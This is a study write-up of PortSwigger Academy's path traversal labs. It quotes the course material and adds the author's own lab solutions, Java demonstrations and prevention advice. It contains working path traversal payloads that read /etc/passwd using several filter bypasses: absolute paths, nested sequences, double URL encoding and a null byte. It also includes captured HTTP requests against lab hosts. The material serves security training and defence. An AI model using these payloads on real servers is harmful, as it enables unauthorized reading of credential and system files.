PortSwigger Academy - Path traversal.

https://portswigger.net/web-security/learning-paths/path-traversal

This learning path covers path traversal vulnerabilities. You’ll learn how to carry out path traversal attacks and circumvent common obstacles. You’ll also learn how to prevent path traversal attacks.


What is path traversal?#

Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application. This might include:

  • Application code and data.
  • Credentials for back-end systems.
  • Sensitive operating system files.

In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to modify application data or behavior, and ultimately take full control of the server.

Reading arbitrary files via path traversal#

Imagine a shopping application that displays images of items for sale. This might load an image using the following HTML:

<img src="/loadImage?filename=218.png">

The loadImage URL takes a filename parameter and returns the contents of the specified file. The image files are stored on disk in the location /var/www/images/. To return an image, the application appends the requested filename to this base directory and uses a filesystem API to read the contents of the file. In other words, the application reads from the following file path:

/var/www/images/218.png

This application implements no defenses against path traversal attacks. As a result, an attacker can request the following URL to retrieve the /etc/passwd file from the server’s filesystem:

https://insecure-website.com/loadImage?filename=../../../etc/passwd

This causes the application to read from the following file path:

/var/www/images/../../../etc/passwd

The sequence ../ is valid within a file path, and means to step up one level in the directory structure. The three consecutive ../ sequences step up from /var/www/images/ to the filesystem root, and so the file that is actually read is:

/etc/passwd

On Unix-based operating systems, this is a standard file containing details of the users that are registered on the server, but an attacker could retrieve other arbitrary files using the same technique.
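The resolution described above can be reproduced with a minimal Java sketch. The class and method names are hypothetical, it assumes a Unix-like system, and it only models the string handling: it does not read any file. `normalize()` is purely lexical, which is enough to show where the path ends up.

```java
import java.nio.file.Paths;

// Hypothetical model of the loadImage handler; not the real application's code.
class NaiveImageLoader {
    static final String BASE_DIRECTORY = "/var/www/images/";

    // The vulnerable step: the filename is appended to the base directory unchecked.
    static String requestedPath(String filename) {
        return BASE_DIRECTORY + filename;
    }

    // Collapses the "../" segments lexically, showing which file would be opened.
    static String effectivePath(String filename) {
        return Paths.get(requestedPath(filename)).normalize().toString();
    }

    public static void main(String[] args) {
        System.out.println(requestedPath("../../../etc/passwd"));
        System.out.println(effectivePath("../../../etc/passwd"));
    }
}
```

On a Unix-like system this prints /var/www/images/../../../etc/passwd followed by /etc/passwd.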

On Windows, both ../ and ..\ are valid directory traversal sequences. The following is an example of an equivalent attack against a Windows-based server:

https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

Lab: File path traversal, simple case#

This lab contains a path traversal vulnerability in the display of product images. To solve the lab, retrieve the contents of the /etc/passwd file.

Solution#

To solve this, I started by right-clicking an image to grab its source URL. That gave me something like:

0aaf00eb033990da81ca5247006800a9.web-security-academy.net/image?filename=8.jpg

Then I kept prepending ../ to the filename value, one level at a time, until the path climbed out of the image directory to the filesystem root and the request returned /etc/passwd.

The solution ended up being:

https://0aaf00eb033990da81ca5247006800a9.web-security-academy.net/image?filename=../../../etc/passwd
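The trial-and-error step can be made less manual by generating one candidate value per depth. This is only a sketch: the class name and the maxDepth parameter are my own, it needs Java 11+ for String.repeat, and it builds the strings without sending any request.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical helper that lists filename values to try, shallowest first.
class TraversalDepthPayloads {
    static List<String> candidates(String target, int maxDepth) {
        List<String> payloads = new ArrayList<>();
        for (int depth = 1; depth <= maxDepth; depth++) {
            // depth copies of "../" followed by the file we want to reach
            payloads.add("../".repeat(depth) + target);
        }
        return payloads;
    }

    public static void main(String[] args) {
        for (String payload : candidates("etc/passwd", 5)) {
            System.out.println("/image?filename=" + payload);
        }
    }
}
```

On Unix, stepping up from the root stays at the root, so using more ../ sequences than strictly needed normally does no harm.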

Common obstacles to exploiting path traversal vulnerabilities#

Many applications that place user input into file paths implement defenses against path traversal attacks. These can often be bypassed.

If an application strips or blocks directory traversal sequences from the user-supplied filename, it might be possible to bypass the defense using a variety of techniques.

You might be able to use an absolute path from the filesystem root, such as filename=/etc/passwd, to directly reference a file without using any traversal sequences.
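One plausible way this happens, sketched in Java under my own assumptions (the class name and the ".." filter are hypothetical, and a Unix-like system is assumed): the filter only looks for traversal sequences, while Path.resolve returns an absolute argument unchanged instead of joining it to the base directory.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

// Hypothetical handler: blocks ".." but still trusts absolute paths.
class AbsolutePathBypass {
    static final Path BASE_DIRECTORY = Paths.get("/var/www/images");

    static Path resolve(String filename) {
        if (filename.contains("..")) {
            throw new IllegalArgumentException("traversal sequence blocked");
        }
        // If filename is absolute, resolve() returns it as-is and ignores the base.
        return BASE_DIRECTORY.resolve(filename);
    }

    public static void main(String[] args) {
        System.out.println(resolve("5.jpg"));
        System.out.println(resolve("/etc/passwd"));
    }
}
```

Not every API behaves this way. In Java, new File(parent, child) joins the two strings even when child starts with a slash, so the outcome depends on which call the application uses.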

Lab: File path traversal, traversal sequences blocked with absolute path bypass#

This lab contains a path traversal vulnerability in the display of product images.

The application blocks traversal sequences but treats the supplied filename as being relative to a default working directory.

To solve the lab, retrieve the contents of the /etc/passwd file.

Solution#

We intercept the request for a product image:

GET /image?filename=5.jpg HTTP/2
Host: 0aa500d104625ca68276601f00de0098.web-security-academy.net
Cookie: session=GvEnpHbu8HvC87C9631Fuv2PbCXDjwyX
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://0aa500d104625ca68276601f00de0098.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: i

and replace
GET /image?filename=5.jpg
with
GET /image?filename=/etc/passwd

Common obstacles to exploiting path traversal vulnerabilities - Continued#

You might be able to use nested traversal sequences, such as ....// or ....\/. These revert to simple traversal sequences when the inner sequence is stripped.
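A short Java sketch of why a single stripping pass is not enough. The class and method names are hypothetical, and I am assuming the filter is a plain replace of "../", which may not be exactly what a given application does.

```java
// Hypothetical filter implementations, for illustration only.
class NonRecursiveStrip {
    // One pass: each "../" found is removed, but the result is not re-checked.
    static String stripOnce(String filename) {
        return filename.replace("../", "");
    }

    // Repeats the pass until no "../" is left.
    static String stripUntilStable(String filename) {
        String current = filename;
        while (current.contains("../")) {
            current = current.replace("../", "");
        }
        return current;
    }

    public static void main(String[] args) {
        String nested = "....//....//....//etc/passwd";
        System.out.println(stripOnce(nested));        // ../../../etc/passwd
        System.out.println(stripUntilStable(nested)); // etc/passwd
    }
}
```

Even the repeated version only covers this one sequence. Stripping is a weak defense compared with validating the input and checking the canonical path.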

Lab: File path traversal, traversal sequences stripped non-recursively#

This lab contains a path traversal vulnerability in the display of product images.

The application strips path traversal sequences from the user-supplied filename before using it.

To solve the lab, retrieve the contents of the /etc/passwd file.

Solution#

Because the lab strips path traversal sequences, sending the plain payload:

GET /image?filename=../../../etc/passwd HTTP/2
Host: 0a78008203c6729a829a255500bd0024.web-security-academy.net
Cookie: session=RoX9uyjy6phuxm1jfFK3AksmsDJ5GQAg
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://0a78008203c6729a829a255500bd0024.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=2, i

gets us:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"No such file"

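Instead, we replace
GET /image?filename=../../../etc/passwd HTTP/2
with
GET /image?filename=....//....//....//etc/passwd HTTP/2

Once the filter strips the inner ../ from each ....// sequence, what remains is ../, so the application ends up reading ../../../etc/passwd.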

Common obstacles to exploiting path traversal vulnerabilities - Continued#

In some contexts, such as in a URL path or the filename parameter of a multipart/form-data request, web servers may strip any directory traversal sequences before passing your input to the application. You can sometimes bypass this kind of sanitization by URL encoding, or even double URL encoding, the ../ characters. This results in %2e%2e%2f and %252e%252e%252f respectively. Various non-standard encodings, such as ..%c0%af or ..%ef%bc%8f, may also work.
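The double-encoding bypass can be sketched in Java as follows. The two-stage handler is an assumption of mine about how such a flaw could arise (names are hypothetical), and the Charset overload of URLDecoder.decode needs Java 10+.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

// Hypothetical handler: decode, filter, then decode a second time.
class SuperfluousDecode {
    static String decodeOnce(String value) {
        return URLDecoder.decode(value, StandardCharsets.UTF_8);
    }

    static String handle(String rawParameter) {
        String afterFirstDecode = decodeOnce(rawParameter);
        if (afterFirstDecode.contains("../")) {
            throw new IllegalArgumentException("traversal sequence blocked");
        }
        // The superfluous second decode turns %2e%2e%2f back into ../
        return decodeOnce(afterFirstDecode);
    }

    public static void main(String[] args) {
        String payload = "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd";
        System.out.println(decodeOnce(payload)); // %2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
        System.out.println(handle(payload));     // ../../../etc/passwd
    }
}
```

A singly encoded payload is decoded before the filter runs and is rejected. Only the doubly encoded one survives the check.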

Lab: File path traversal, traversal sequences stripped with superfluous URL-decode#

This lab contains a path traversal vulnerability in the display of product images.

The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it.

To solve the lab, retrieve the contents of the /etc/passwd file.

Solution#

At first we tried:

GET /image?filename=../../../etc/passwd HTTP/2
and
GET /image?filename=....//....//....//etc/passwd HTTP/2

but both returned:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"No such file"

Instead, we double URL-encode each ../ sequence:
../ -> %2e%2e%2f -> %252e%252e%252f

GET /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd HTTP/2

Common obstacles to exploiting path traversal vulnerabilities - Continued#

An application may require the user-supplied filename to start with the expected base folder, such as /var/www/images. In this case, it might be possible to include the required base folder followed by suitable traversal sequences. For example: filename=/var/www/images/../../../etc/passwd.
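A minimal Java sketch of why a prefix check on the raw string is not enough. The names are hypothetical, a Unix-like system is assumed, and normalize() stands in for what the filesystem does with the ../ segments.

```java
import java.nio.file.Paths;

// Hypothetical validation that only inspects the start of the raw string.
class PrefixCheckBypass {
    static final String REQUIRED_PREFIX = "/var/www/images";

    static boolean passesPrefixCheck(String filename) {
        return filename.startsWith(REQUIRED_PREFIX);
    }

    // Where the path actually points once the "../" segments are collapsed.
    static String effectivePath(String filename) {
        return Paths.get(filename).normalize().toString();
    }

    public static void main(String[] args) {
        String payload = "/var/www/images/../../../etc/passwd";
        System.out.println(passesPrefixCheck(payload)); // true
        System.out.println(effectivePath(payload));     // /etc/passwd
    }
}
```

The check passes because it runs before the path is collapsed. Running it on the canonical path instead would reject the payload.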

Lab: File path traversal, validation of start of path#

This lab contains a path traversal vulnerability in the display of product images.

The application transmits the full file path via a request parameter, and validates that the supplied path starts with the expected folder.

To solve the lab, retrieve the contents of the /etc/passwd file.

Solution#

We replace

GET /image?filename=/var/www/images/47.jpg HTTP/2
with
GET /image?filename=/var/www/images/../../../etc/passwd HTTP/2

Common obstacles to exploiting path traversal vulnerabilities - Continued#

An application may require the user-supplied filename to end with an expected file extension, such as .png. In this case, it might be possible to use a null byte to effectively terminate the file path before the required extension. For example: filename=../../../etc/passwd%00.png.
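The mismatch can be simulated in Java, with a big caveat: this is a simulation, not an exploit. Modern Java file APIs reject paths containing a NUL character, so asSeenByNativeApi (a hypothetical helper, like the other names here) only imitates a C-style API that treats the first NUL as the end of the string.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

// Hypothetical simulation of an extension check followed by a NUL-terminated API.
class NullByteBypass {
    static String decode(String rawParameter) {
        return URLDecoder.decode(rawParameter, StandardCharsets.UTF_8); // %00 becomes U+0000
    }

    // The validation sees the whole string, including ".png" after the NUL.
    static boolean passesExtensionCheck(String filename) {
        return filename.endsWith(".png");
    }

    // A C-style API would stop reading the path at the first NUL character.
    static String asSeenByNativeApi(String filename) {
        int nul = filename.indexOf('\0');
        return nul >= 0 ? filename.substring(0, nul) : filename;
    }

    public static void main(String[] args) {
        String decoded = decode("../../../etc/passwd%00.png");
        System.out.println(passesExtensionCheck(decoded)); // true
        System.out.println(asSeenByNativeApi(decoded));    // ../../../etc/passwd
    }
}
```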

Lab: File path traversal, validation of file extension with null byte bypass#

This lab contains a path traversal vulnerability in the display of product images.

The application validates that the supplied filename ends with the expected file extension.

To solve the lab, retrieve the contents of the /etc/passwd file.

Solution#

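We use the null byte trick: the supplied value still ends in .png, so it passes the extension check, but the null byte terminates the file path before the extension. The payload is filename=../../../etc/passwd%00.png.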

How to prevent a path traversal attack#

The most effective way to prevent path traversal vulnerabilities is to avoid passing user-supplied input to filesystem APIs altogether. Many application functions that do this can be rewritten to deliver the same behavior in a safer way.

If you can’t avoid passing user-supplied input to filesystem APIs, we recommend using two layers of defense to prevent attacks:

  • Validate the user input before processing it. Ideally, compare the user input with a whitelist of permitted values. If that isn’t possible, verify that the input contains only permitted content, such as alphanumeric characters only.
  • After validating the supplied input, append the input to the base directory and use a platform filesystem API to canonicalize the path. Verify that the canonicalized path starts with the expected base directory.

Below is an example of some simple Java code to validate the canonical path of a file based on user input:

File file = new File(BASE_DIRECTORY, userInput);
if (file.getCanonicalPath().startsWith(BASE_DIRECTORY)) {
    // process file
}
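Putting both layers together, here is a slightly fuller sketch. It is my own variation, not PortSwigger's code: the class name, the allow-list pattern and the Optional return type are assumptions. It compares paths component by component with Path.startsWith, because a plain string prefix check would also accept a sibling directory such as /var/www/images-evil when BASE_DIRECTORY has no trailing separator.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Optional;
import java.util.regex.Pattern;

// Hypothetical resolver combining input validation with a canonical path check.
class SafeImageResolver {
    static final Path BASE_DIRECTORY = Paths.get("/var/www/images");
    // Layer 1: accept only names such as "218.png" (assumed naming scheme).
    static final Pattern ALLOWED_NAME = Pattern.compile("[A-Za-z0-9]+\\.(png|jpg)");

    // Layer 2: the normalized path must still sit under the base directory.
    static boolean isInsideBase(Path candidate) {
        return candidate.toAbsolutePath().normalize().startsWith(BASE_DIRECTORY);
    }

    static Optional<Path> resolve(String userInput) {
        if (!ALLOWED_NAME.matcher(userInput).matches()) {
            return Optional.empty();
        }
        Path candidate = BASE_DIRECTORY.resolve(userInput).normalize();
        return isInsideBase(candidate) ? Optional.of(candidate) : Optional.empty();
    }

    public static void main(String[] args) {
        System.out.println(resolve("218.png"));
        System.out.println(resolve("../../../etc/passwd"));
    }
}
```

normalize() is lexical and does not follow symbolic links. Where the file is known to exist, Path.toRealPath() or File.getCanonicalPath() resolves links as well.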